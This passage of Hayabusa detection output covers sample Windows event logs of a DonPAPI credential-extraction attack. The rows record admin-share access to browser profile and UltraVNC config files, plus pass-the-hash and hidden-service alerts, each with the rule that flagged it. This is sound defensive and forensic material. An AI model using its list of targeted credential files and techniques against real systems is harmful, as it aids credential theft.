Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724935,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724935,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724935,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724935,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.127 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724935 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x872496f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x872496f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x872496f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x872496f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.189 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x872496f | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x87249a8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.269 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249a8 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249e1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249e1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249e1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x87249e1,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.333 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249e1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724a17,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724a17,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724a17,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724a17,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.382 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724a17 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ba1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.476 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ba1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724bd7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.539 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724bd7 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 